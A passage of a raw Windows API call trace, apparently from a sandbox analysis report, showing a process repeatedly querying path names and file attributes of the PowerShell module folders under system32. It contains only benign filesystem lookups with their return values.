"c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.xaml")) returned 0xffffffff [0089.140] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.ni.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.ni.dll")) returned 0xffffffff [0089.140] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.dll")) returned 0xffffffff [0089.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0089.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0089.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.140] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xca1d0904, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd9467d5c, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xca1d0904, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0089.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x40, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0089.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.140] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x919bae56, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x919bae56, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0089.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0089.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x3e, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0089.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.141] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0089.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x37, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0089.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.141] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24bb5be0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bb5be0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0089.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x50, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0089.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.142] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b1d660, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b437c0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b437c0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0089.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0089.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.142] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0089.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x4d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0089.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.142] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x56 [0089.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts", nBufferLength=0x56, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts", lpFilePart=0x0) returned 0x55 [0089.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.143] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.localaccounts"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b437c0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b437c0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b437c0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0089.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0089.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.143] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0089.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x53, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0089.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.144] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b437c0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b437c0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b437c0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0089.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0089.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x51, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0089.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.144] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24ce66e0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24ce66e0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24ce66e0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0089.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0089.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.145] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24bb5be0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24bb5be0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bb5be0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0089.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x4e, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0089.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.145] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24ce66e0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24d0c840, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24d0c840, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x48 [0089.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", nBufferLength=0x48, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", lpFilePart=0x0) returned 0x47 [0089.146] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.146] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkswitchmanager"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b1d660, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b1d660, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b1d660, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.146] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0089.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x4f, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", lpFilePart=0x0) returned 0x4e [0089.146] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.146] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24bdbd40, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24ce66e0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24ce66e0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.146] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0089.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x41, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40 [0089.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.147] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x24bdbd40, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bdbd40, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0089.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x42, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", lpFilePart=0x0) returned 0x41 [0089.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.147] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psscheduledjob"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24bb5be0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24bb5be0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bb5be0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0089.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow", nBufferLength=0x3e, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow", lpFilePart=0x0) returned 0x3d [0089.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.148] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflow"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x45 [0089.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility", nBufferLength=0x45, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility", lpFilePart=0x0) returned 0x44 [0089.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.148] GetFileAttributesExW (in: 